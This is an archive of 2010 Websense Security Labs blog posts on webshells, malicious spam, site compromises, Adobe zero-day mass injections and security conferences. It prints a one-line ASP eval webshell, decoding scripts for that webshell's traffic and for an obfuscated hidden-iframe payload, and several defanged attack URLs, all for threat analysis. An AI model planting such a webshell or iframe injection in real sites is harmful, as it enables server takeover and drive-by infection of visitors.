
June 2010 Posts

Analysis of a backdoor's communication process
Posted: 30 Jun 2010 06:57 AM

Websense Security Labs™ ThreatSeeker™ Network has detected a backdoor written by a Chinese hacker spreading in the wild. In this post we look at what an attacker can do with such a backdoor.

The controller client of the backdoor can browse and modify every file on a compromised server:

Attackers can also use the client to run commands on the compromised server:

Because the controller does all the work on the client side, the server side is only a line or two of ASP or PHP, which makes it easy to plant in an existing Web page through SQL injection or another vulnerability. The server-side source code looks like this:

<%eval request("hack")%>

By capturing the network traffic, we can see what the backdoor did. Here is an example:

The client side sends the command as an encoded string in the body of a POST request to the server. The string is:

After decoding it, we can see how a command is run on the compromised server:

The parameter z1 is "cmd", which starts a command interpreter on the server side, and the parameter z2 is:

The server's response to this request is a listing of all the files in the current folder:

The above shows a "dir" command being run on a compromised server. Using this method, attackers can run almost any command on the server from the client side.
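To make the traffic pattern above concrete, here is an added example (not code from the post or from the backdoor's author) that decodes a request of this shape: it parses a form-encoded POST body, finds the parameter whose value is handed to eval()/Execute(), and recovers the program and arguments from z1 and z2. The sample body is constructed here, not captured, and the assumption that z1/z2 are base64-encoded is mine; the post only says the string is "encoded".

```javascript
// Added example (not the post's code): decode the POST traffic of a one-line
// eval() webshell such as <%eval request("hack")%>.
// Assumption: z1 and z2 are base64; the post only calls the string "encoded".

// Form-encoded body -> { name: value }. '+' becomes a space, %XX a byte.
function parseFormBody(body) {
  const params = {};
  for (const [name, value] of new URLSearchParams(body)) {
    params[name] = value;
  }
  return params;
}

// Script entry points a one-liner hands its parameter to:
// VBScript eval/Execute/ExecuteGlobal, PHP eval/assert.
const EVAL_CALL = /\b(eval|execute|executeglobal|assert)\s*\(/i;

// Base64 -> text. Note: a '+' inside base64 must arrive as %2B; if it
// arrives raw, URLSearchParams turns it into a space and the decode breaks.
function fromBase64(text) {
  return Buffer.from(text, 'base64').toString('latin1');
}

// Returns null for an ordinary form post; otherwise the parameter that is
// eval'd and the decoded program (z1) and arguments (z2).
function decodeShellRequest(body) {
  const params = parseFormBody(body);
  const evalParam = Object.keys(params).find((k) => EVAL_CALL.test(params[k]));
  if (evalParam === undefined) return null;
  return {
    evalParam,
    program: params.z1 === undefined ? null : fromBase64(params.z1),
    args: params.z2 === undefined ? null : fromBase64(params.z2),
  };
}

// Constructed sample body, not a captured packet: a stand-in stub in "hack"
// (the parameter the one-liner evals), the program in z1 and its arguments
// in z2. "Y21k" is base64 for "cmd", "L2MgZGly" for "/c dir".
const SAMPLE_BODY = new URLSearchParams({
  hack: 'Execute("On Error Resume Next")',
  z1: 'Y21k',
  z2: 'L2MgZGly',
}).toString();

console.log(decodeShellRequest(SAMPLE_BODY));
// { evalParam: 'hack', program: 'cmd', args: '/c dir' }
```

The same check can be run over request bodies from a WAF or proxy capture: a POST whose parameter value contains an eval()/Execute() call, sent to a page that has no business accepting script, is a strong indicator on its own, and the decoded z1/z2 tell you what was actually run.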

 

Websense Messaging and Websense Web Security customers are protected against these attacks.

Hermes Li

SyScan'10 Singapore Conference
Posted: 24 Jun 2010 07:05 PM

Last week, Ulysses and Hermes attended the SyScan'10 Singapore conference, where 17 speakers presented 14 different topics, including software and hardware security.


The many interesting topics at this conference included integrity checking of Microsoft Office documents, Chrome sandboxing, Office vulnerabilities, PHP exploits, and mobile phone attacks.

Our presentation covered the threat trends in SWF and PDF content and how many kinds of attacks rely on Web browser vulnerabilities to spread across the Internet. We showed how antivirus solutions work and how attackers alter the content of malicious files to bypass them. We also demonstrated several ways to counter malicious content embedded in SWF/PDF files and to handle the stripping of such content for end users.

 

Thanks to the organizers for a great conference in a great place!

You can download our presentation here.

Hermes Li

EUSecWest 2010 Wrap-up
Posted: 24 Jun 2010 11:41 AM

I was at EUSecWest 2010 last week to give a talk about binary diffing technology and my tool DarunGrim. The conference ran from June 16th to June 17th. We had a fun time sharing our ideas and findings. Here are brief descriptions of the talks that I attended.

Rainbow Tables Reimplemented

Sebastian "naxxatoe" Graf

This talk was about reimplementing traditional rainbow tables in a more efficient way. The speaker has some source code and a table itself to release in the near future.

Having fun with Apple's IOKit

Ilja Van Sprundel, IOActive

The speaker presented some preliminary research on IOKit from the perspective of a security researcher. It seems as if no one else has investigated this area thoroughly, and it could be the next gold mine.

Auditing C#

Vincent Berg, IOActive

This talk offered both basic and advanced material on auditing code written in C#. C# is regarded as a generally secure language, but there are still many ways in which it can fail.

Escaping the Sandbox

Stephen Ridley, Matasano

The speaker described many types of sandboxes currently in use on Windows systems. He showed real examples and used debugger output to demonstrate the various options that modern sandboxes are capable of providing. He also released a sandbox analysis toolkit called SandKit, which is available here.

DarunGrim - A Tool for Binary Diffing and Automatic Vulnerabilities Pattern Matching

Jeongwook (Matt) Oh

This was actually my presentation. I presented the technology of binary diffing and proposed a new concept of smart binary diffing. I built a system for binary management and introduced a new index value called the "security implication score". This score tells you which modification has more security implications. The package that contains all of these improvements will be released in a few weeks. The presentation material is available here.

Fighting PDF Malware with ExeFilter

Philippe Lagadec, NATO/NC3A

PDF is a hot issue these days, and here is a tool to sanitize all your suspicious PDF files before you open them. This is a great open source project that implements a PDF normalizer to remove any suspicious objects from PDF files. The package is available here.

Defending the Poor - Flash Defense

Joern Bratzke, Recurity Labs

This presentation was about a project funded by the German government. The project page is here. The cool thing is that this is an open source project. The main functionality is normalization through recreation: it actually understands Flash AVM code and rewrites it to be normalized and harmless. The only pitfall I'm seeing is that it currently supports only AVM1 code.

Hacking Oracle from Web Apps

Sumit Siddharth, 7Safe

Unfortunately, I was not able to attend all of this presentation, but the demonstration was cool. Using SQL injection, you can basically execute any commands you want on the server.

Location Aware DoS Attacks (how proposed IETF drafts can change the future of DoS)

Keith Myers & Jose Avila, ONZRA

This talk was about abusing EDNS to circumvent location-based DNS responses. This technique opens a way to find the actual target the attacker is interested in for DoS attacks.

Milking a horse or executing remote code in modern Java Web frameworks

Meder Kydyraliev, Google

The speaker presented a unique way to own a Java Web framework. By overwriting some internal variables through a vulnerability in the Spring Web Framework, he could take over the Web server and execute any command he wanted. The related vulnerability is published here.

Legic Prime: Obscurity in Depth

Karsten Nohl & Hendryk Plötz, Security Research Labs

This talk was about breaking an RFID smart card called Legic Prime. This card was introduced more than a decade ago and has been regarded as very safe against duplication or forgery. But two brilliant researchers cracked the underlying obfuscation logic and could duplicate or create any kind of card they wanted.

Hacking Printers for fun and profit

Andrei Costin

This talk was about owning printers. Printers could be a critical attack point in the future. There are many potential ways in which they can be backdoored and used for collecting valuable information. Even more serious is that nobody seems to be paying attention to protecting printers, even though they can easily be misused. The full presentation file is here.

Immature Femtocells

Ravishankar Borgaonkar & Kevin Redon, Technical University of Berlin

This talk was about exploiting a femtocell device. I had never heard about femtocells before. Basically, a femtocell is a personal cell tower: you connect it through your broadband line, and it passes through all your voice and data traffic. If you are out of coverage from your cell phone service provider, you can use this device to make your cell phone work over an Internet connection. The device is supposed to be heavily protected. What the speakers accomplished was jailbreaking and rooting the device. The device itself tries to gather location information from various sources, such as the IP address and GPS signal, but these could all be circumvented, for example with a $12 GPS jammer and a VPN connection to a home network. Basically, with the methods they presented, you can use your cell phone anywhere in the world without additional charges. They included some live demos. U.S. wireless service providers have similar devices, and this is a problem that we all need to pay more attention to.

That's it. This conference was unique, and a great experience for me. All the subjects gave me something to think about. Thanks to @dragosr and the SecWest staff for inviting me to this great conference.

My next talk will be at Black Hat USA 2010 and DEF CON 18, so if you're interested in binary diffing or locating vulnerabilities using static analysis, my talk may help you a lot. The title is "ExploitSpotting: Locating Vulnerabilities Out Of Vendor Patches Automatically".

See you there.

Matt Oh

iPhone Launch Triggers Nefarious Activity
Posted: 24 Jun 2010 02:53 AM

With the official launch of Apple's iPhone 4 today, people are queuing outside stores to get hold of the latest smartphone.

Spammers never miss an opportunity to jump on the hype around a new product launch, especially in the case of the iPhone 4, where all 600,000 pre-orders had been allocated before the official launch date. Our ThreatSeeker Network has identified iPhone 4-themed spam and Facebook wall posts. Users tempted by the offer of a free iPhone 4 are led into affiliate campaigns that harvest email addresses in order to push further products on them.

We have been seeing Facebook posts that entice users with the possibility of receiving a free iPhone 4, as shown below.

Facebook post:

Upon clicking the URL within the Facebook post, the user progresses through a series of data collection pages (requests for an email address and full postal address), each enticing the user with the offer of a free iPhone 4.

Within our Hosted Email Security service we are also seeing spam campaigns jumping on the iPhone 4 theme. The example below, of which we have seen over 300,000 instances, leads to a Russian domain pushing a pharmacy website.

A second example offering a free iPhone.

More information on the queues outside stores is here.

Websense Messaging and Websense Web Security customers are protected against these attacks.

Carl Leonard

Malicious Notification Spam: Account Verification
Posted: 22 Jun 2010 03:38 AM

Websense Security Labs™ ThreatSeeker™ Network has detected a malicious spam outbreak with the Subject line "Account Verification". As of June 22, we have counted more than 100,000 of these messages. The attack message is disguised as coming from Digg.com and asks the recipient to verify their Digg.com account. Clicking the "Password change" link in the email body redirects the user to malicious websites (see the screenshot below).

Malicious email body screenshot:

The malicious payload:

There are two malicious links in the payload. The first link redirects the user to a site that prompts the user to download a Trojan file (29% detection). The second link (in an iframe) redirects the user to a site laden with exploits.
Websense Messaging and Websense Web Security customers are protected against these attacks.

dreamtemplate.com compromised
Posted: 17 Jun 2010 05:22 PM

Websense Security Labs™ ThreatSeeker™ Network has discovered that the popular site dreamtemplate.com has been compromised. Websense customers are protected from this threat.

The site has been injected with an iframe that leads to a site that is only one day old. The file dropped by the exploit has only a 10% detection rate.

Screenshot of the infected Web site:

Screenshot of the injection:

Elad Sharf

This Month in the Threat Webscape - May 2010
Posted: 16 Jun 2010 02:00 AM

Major Hits

 

A few Web sites belonging to the U.S. Department of the Treasury were compromised and injected with a malicious iframe which loaded exploit code for visitors (video included). Yet another large-scale attack targeting WordPress installs occurred, leading visitors to rogue AV sites, pharmaceutical spam, Zeus C&C sites, and other shoddy Web sites. PHP-Nuke, a popular PHP-based CMS, had its Web site compromised and injected with a malicious iframe. In case it isn't yet obvious, breaking into legitimate, popular Web sites and then inserting an iframe that loads up exploits is a popular thing among blackhat hackers these days.

In the UK, search terms relating to the UK General Election were poisoned (blackhat SEO), and unsuspecting Web users clicking on the wrong results in Google would find themselves on fake antivirus Web sites.

Across the pond in the east, the country with the largest number of Web users (China) saw at least two major infections. The first compromise was Chinaz.com, a well-known Web site for Web masters. The second was the game channel of MOP BBS, one of the largest and most influential forums in the country. In both cases, these sites were infecting their own visitors. This appears to be the primary motivation for blackhat hackers to break into popular sites: it gives them the opportunity to infect the site's regular visitors.

 

Web 2 dot uh oh

 

This month was a banner month of Facebook "oops". First, a flaw in the site exposed live chat sessions and other private user information (video). Then there was an onslaught of malicious links spreading virally within Facebook's platform using social engineering tactics that many Facebook users fall for, unknowingly exposing their own Facebook friends to the malicious links.

In all of these cases, the app tricks the user into downloading a malicious .exe file disguised as a "Flash" or "FLV" player. You may also opt to install our security application for Facebook, the world's first and only real-time security app that protects your wall from such unwanted messages. It's available for free at http://defensio.com

In other news, Dasient reports that 1.3 million malicious ads (malvertising) are viewed each day, with 59% of those resulting in a drive-by download and 41% resulting in fake security software (rogue AV / scareware).

 

Browser and Friends

 

A new security update for Shockwave Player is available; 18 critical vulnerabilities have been patched. Adobe categorized this as a critical update and strongly recommends installing it. According to Brad Arkin, Adobe's Director of Product Security and Privacy, Adobe is considering shortening the Adobe Reader update cycle from 90 to 30 days, to relieve customers who have already suffered a great deal from security vulnerabilities. Flash and Shockwave may also be brought into this update cycle.

A zero-day vulnerability in the Safari browser has been discovered: the vulnerability may lead to the exposure of sensitive information or even the execution of arbitrary code. A POC (.rar) has been published here.

Opera Software has released Opera 10; an "extremely severe" security vulnerability that could lead to remote code execution has been patched.

In October 2009, Mozilla pushed the "Plugin Check" project live, which checks the update status of the plugins in Firefox and helps users update them. This was a very good idea, as old versions of plugins are a major security hole nowadays. Now Mozilla has made a great effort and extended the service to other browsers: Safari, Chrome and Opera are now fully supported, and IE has limited support.

 

If you're used to just clicking through Java warnings on Web sites that say "This application's signature cannot be verified. Do you want to run this application?", you might want to think twice. We picked up a trend of malicious Java applets that download a malicious .exe file - which is then executed on your desktop.

 

Microsoft

 

May's Patch Tuesday included two remote code execution vulnerabilities, one in their mail clients and the other in Visual Basic. Patch MS10-030 was for vulnerability CVE-2010-0816, an integer overflow bug in Outlook Express and Windows Mail that can lead to remote code execution. Patch MS10-031 was for vulnerability CVE-2010-0815, covering a stack memory corruption problem with the parsing code for ActiveX handling.

 

The SharePoint XSS bug we mentioned last month hasn't been patched yet.

 

Microsoft also announced an unpatched vulnerability (CVE-2009-3678) in the Canonical Display Driver (CDD) in 64-bit Windows Server 2008 R2 and Windows 7 when the Aero theme is enabled. While remote code execution is possible, Microsoft considers denial-of-service attacks more realistic. Their advisory is still available, but Microsoft appears to have retracted its MSRC/SRD blog post about the vulnerability.

Hello ThreatSeeker. You've got mail!

 

Malicious social engineering just doesn't seem to go away and looks like it won't any time soon! This month has been a testament to that with all the different tricks being used. We saw lures involving Facebook, iTunes, Amazon, Adobe, and even job applications.

 

Early in the month, we reported on a campaign of malicious emails which enticed users into installing a backdoor. The fruit of temptation was a Facebook toolbar which was spread via a link in the email; the link even led to a file named toolbar.exe. We also reported on a campaign of malicious attachment spam which claimed to be iTunes gift certificates. There were also messages from supposed job hunters which were sent out in a large email campaign. The unfortunate victims of this job hunter spam campaign were met with a rogue AV installation. Last, but of course not least, we saw the ever-present threat, Zeus, sending out a clever new campaign of emails. This campaign took great care in tricking victims into downloading malware. These Zeus messages contained a PDF attachment as well as a link to a malicious executable file in the email message. To make the messages more believable, they were made to look like forwarded mail from a security director within your company which explained that Adobe Reader needed to be updated.

Security Trends

 

Symantec's recent report (.PDF) said that the Zeus crimeware kit and the growth of malicious PDFs, based on the integration of Adobe flaws into popular malware kits, make it easier for unskilled attackers to compromise computers and steal information. The effectiveness of an up-to-date antivirus against Zeus is just 23%. PDF attacks, meanwhile, accounted for 49% of Web-based attacks in 2009.

Researchers from VeriSign's iDefense Intelligence Operations Team conclude that the average price on the underground marketplace for renting a botnet is $67 for 24 hours, and $9 for hourly access. The low price of these services comes down to a simple fact: the increasing supply of malware-infected hosts.

According to a paper (.PDF) published by the Electronic Frontier Foundation (EFF), it is possible for Web sites to track users across the Web using the unique fingerprint of their browser.

Modularization of malware makes it more difficult for AV vendors to collect samples of all the various modules, as attackers can deliver them selectively to their targets.

 

This month's contributors:

  • Ulysses Wang
  • Lei Li
  • Erik Buchanan
  • Chris Astacio
  • Jay Liew

 


Jay Liew

Drawing similarities between email and web attacks
Posted: 14 Jun 2010 03:52 PM

Websense® Security Labs™ ThreatSeeker™ Network has detected an interesting correlation between recent rounds of malicious emails and the JavaScript files being used in mass injections. First, let's think about recent malicious email campaigns. If you review our recent blog posts about fake virus alerts and World Cup-related malicious spam, you will see that the common theme in the two campaigns is that they contain heavily obfuscated scripts in their HTML attachments. In fact, we've seen from our bot lab that Zeus variants seem to be responsible for these messages, as well as for a number of other messages with different subjects and themes that carry malicious HTML attachments. The script from one of the email variants seemed oddly familiar.

Screenshot of one of the attached malicious HTML files:

Our ThreatSeeker™ Network puts us in the unique position of being able to scan both emails and malicious Web sites to gain insights like these. Following up on another reported mass-injection campaign revealed a similarity that shouldn't be ignored between the injected .js files on compromised sites and the email attachments.

 

Screenshot of a malicious JavaScript file used in the injection attacks:

 

In fact, after deobfuscating these by hand, we found that the two files use the same algorithm to deobfuscate their hidden contents. These files fragment an obfuscated script among a number of variables in the file and concatenate them to get one long, obfuscated string. This string then goes through a series of .replace calls to turn it into an escaped string. Once the string is unescaped, the resulting character codes are obtained and used in an XOR operation. The string of numbers resulting from this XOR is then decoded as character codes to obtain the final, clear HTML attack code.

Step 1: Concatenate several variables to obtain one long, obfuscated string.

Step 2: Decipher the above string with a number of .replace actions to get an escaped string.

Step 3: Unescape the above string to get a listing of seemingly random characters.

Step 4: Obtain the character codes for each character in the above string.

Step 5: XOR the above character codes to get another string of character codes.

The final step is obtaining the characters that the above codes represent. Below are the screenshots of the final, clear script code generated by deobfuscating the email attachment and the .js files that are inserted into compromised hosts.
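The five steps above, as an added worked example in JavaScript (not the attackers' script and not code from the post): the decoder applies the steps in order, and a small encoder is used only to construct a sample that has the same layout. The XOR key, the tokens that the .replace chain substitutes, and the payload are assumptions; the real values are visible only in the screenshots.

```javascript
// Added example (not the attackers' script, not the post's code): the
// five-step decoder described above. Key, substitution tokens and payload
// are assumptions; the real values are only visible in the screenshots.

const XOR_KEY = 0x37; // assumed single-byte key

// What the .replace chain restores, applied in this order: token -> meaning.
const SUBSTITUTIONS = [
  ['~', '%'], // the escape marker was hidden as '~'
  ['_', '7'], // the hex digit 7 was hidden as '_'
];

// Steps 1 to 5 of the post, then the final character conversion.
function deobfuscate(fragments, substitutions, key) {
  // Step 1: concatenate the fragments into one long obfuscated string.
  let s = fragments.join('');
  // Step 2: the series of .replace calls turns it into an escaped string.
  for (const [token, meaning] of substitutions) {
    s = s.split(token).join(meaning); // global replace, no regex escaping
  }
  // Step 3: unescape the %XX sequences (own implementation, not unescape()).
  const unescaped = s.replace(/%([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
  // Step 4: take the character code of every character.
  const codes = Array.from(unescaped, (ch) => ch.charCodeAt(0));
  // Step 5: XOR each code with the key.
  const plainCodes = codes.map((c) => c ^ key);
  // Final step: the codes are the clear script's characters.
  return String.fromCharCode(...plainCodes);
}

// Inverse of deobfuscate(); used only to build the sample with the same
// layout (XOR -> escape -> token substitution -> fragment into variables).
function obfuscate(clear, substitutions, key, chunk) {
  let s = Array.from(clear, (ch) =>
    '%' + (ch.charCodeAt(0) ^ key).toString(16).toUpperCase().padStart(2, '0')
  ).join('');
  for (const [token, meaning] of [...substitutions].reverse()) {
    s = s.split(meaning).join(token);
  }
  const fragments = [];
  for (let i = 0; i < s.length; i += chunk) fragments.push(s.slice(i, i + chunk));
  return fragments;
}

// Constructed payload, not the real one: a hidden iframe landing on the
// /index.php?pid=7 path the post's traffic shows, on a reserved domain.
const SAMPLE_CLEAR =
  '<iframe src="http://example.invalid/index.php?pid=7" width="0" height="0"></iframe>';
const SAMPLE_FRAGMENTS = obfuscate(SAMPLE_CLEAR, SUBSTITUTIONS, XOR_KEY, 24);

// Runs the decoder over the sample and returns the recovered clear script.
function demo() {
  return deobfuscate(SAMPLE_FRAGMENTS, SUBSTITUTIONS, XOR_KEY);
}

console.log(SAMPLE_FRAGMENTS.slice(0, 2)); // what the "variables" look like
console.log(demo());
```

For a real sample you would lift the fragment values, the replace pairs and the XOR key out of the script and feed them to deobfuscate() instead; every step is reversible with the key alone, so the hostile script never has to be executed to recover the clear HTML.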

 

Screenshot of the deobfuscated email attachments:

 

 

Screenshot of the deobfuscated JavaScript attack file:

 

Now, if we follow the HTTP transactions from visiting one of the injected sites, we really begin to see that these appear to be structured as the same attack, possibly coming from the same group. Following one example, we can see that after the browser does a GET for the injected JavaScript file, there are two more GETs for redirection proxies, until finally we land on the attack site at /index.php?pid=7. From there, there are two further GET requests, for /Applet7.html and /Notes7.pdf. If you review the video we posted about the malicious virus alert emails, you will find that the flow for that attack was the same, except for the redirection proxies.

 

Screenshot of the HTTP flow after visiting an injected site:

 

Websense Messaging and Websense Web Security customers are protected against these attacks.

 

Chris Astacio

Adobe 0-day used in mass injections
Posted: 11 Jun 2010 09:38 AM

Unfortunately it was only a matter of time. Until today the latest Adobe 0-day vulnerability (CVE-2010-1297) had only been used in targeted attacks. That changed a few hours ago when we started seeing mass injections adding the following URL to thousands of pages around the world:

 

hxxp://26[REMOVED].in/y[REMOVED]o.js

 

 

As in the targeted attack scenario we blogged about two days ago, our customers are protected by our Websense ACE technology, whereas the AV community still has not caught up. The attack itself uses five different files:

y[REMOVED]o.js - the initial file, which loads an invisible iframe to i[REMOVED].html; detection 0/41 (0.00%). It also loads a statistics file that is not malicious.

i[REMOVED].html - loads l[REMOVED]g.txt and a[REMOVED]ey.swf to launch the exploit; detection 3/40 (7.50%)

l[REMOVED]g.txt - contains the shellcode needed for the exploit to work; detection 0/40 (0.00%)

a[REMOVED]ey.swf - the Flash file containing the exploit; detection 2/41 (4.88%)

l[REMOVED]g.exe - the actual malware that is downloaded; detection 24/41 (58.53%)

The attack is closely related to the hxxp://ww.robint.us/[REMOVED].js attack earlier this week that our friends at Sucuri blogged about, where the common theme was that all Web sites were running on Microsoft IIS and used ASP.NET. In fact, the majority of sites compromised by the new mass injection attack still have the robint.us code present. Below is a video of how the attack works and what happens on a user's computer.

 

 

Adobe released a patch for this vulnerability yesterday and we advise all users to download it immediately. Remember, if you use both Internet Explorer and another browser you have to do this twice. Once for IE and a second time for all other browsers.


Patrik Runald

World Cup Bad News - Malicious Spam
Posted: 11 Jun 2010 01:00 AM

 

Websense® Security Labs™ ThreatSeeker™ Network has detected a new wave of interesting malicious emails.  At the dawn of the eagerly anticipated World Cup tournament, we would expect to be inundated with suitably themed spam.  The sample we have encountered today is a little different from the usual, as the technique used may not raise suspicion.  We have seen over 80,000 email messages in this new campaign, which uses an HTML attachment with an embedded JavaScript.  Upon execution, this script leads to a malicious Web site, from which we are protecting our customers with our real-time analytics in our ACE engine.

 

You will remember that this same technique of using JavaScript to link to a malicious Web site was used in a different spam campaign only yesterday.

 

Below is a screen shot of the email message as seen by an unsuspecting user:


 

Analyzing the attached file, we notice the following obfuscated script:

 

 

Beautified results: we can identify the use of substitution to derive the relevant URL. The "replace" section of the script performs a simple substitution to generate the domain name.

Below we have the de-obfuscated URL:

hxxp://www.advanced[removed].com/xnu4ej/z.htm

 

Following are the results of URL analysis within our tracker. As you can see, we have numerous live real-time analytics protecting against this type of threat and its derivatives:

 

Websense Messaging and Websense Web Security customers are protected against these attacks.


Amon Sanniez


©2012 Websense, Inc. All Rights Reserved.